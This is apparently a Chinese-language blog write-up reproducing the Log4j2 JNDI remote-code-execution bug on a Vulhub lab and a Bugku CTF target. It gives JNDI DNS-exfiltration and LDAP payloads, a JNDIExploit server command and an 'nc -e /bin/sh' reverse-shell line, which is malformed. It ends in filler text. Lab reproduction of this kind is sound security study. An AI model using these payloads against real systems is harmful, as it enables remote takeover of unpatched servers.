记一次Log4j2命令执行漏洞复现

前言：好久之前都想复现下这个著名的漏洞了，但复现之后好像还没完全理解，等实战遇到了再说吧。。

Vulhub靶场

靶机：192.168.234.193

中转机：192.168.234.1  （jdk1.80）

攻击机：192.168.234.129

构造下获取版本号的请求

${jndi:dns://${sys:java.version}.7578feaa.dns.whitehat.asia.}

反弹shell则需要在中转机上启动一个LDAP服务

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.234.1

然后去访问

/solr/admin/cores?action=${jndi:ldap://192.168.234.1:1389/Basic/ReverseShell/192.168.234.129/6666}

Apache Log4j2 RCE (Bugku)

这里使用Log4j2Scan插件来对其进行检测，这里应用为Dnslog检测

发送到插件进行主动扫描

发现了一堆打到平台的记录，漏洞存在。

${jndi:dns://${sys:java.version}.7578feaa.dns.whitehat.asia.}

使用JNDI注入工具起一个LDAP服务，在监听一下6666端口

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 47.115.221.17

将反弹shell的命令进行base64加密加密后填入Base64部分。

nc x.x.x.x 12345 -e /bin/sh${jndi:ldap://x.x.x.x:1389/Basic/Command/Base64

凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字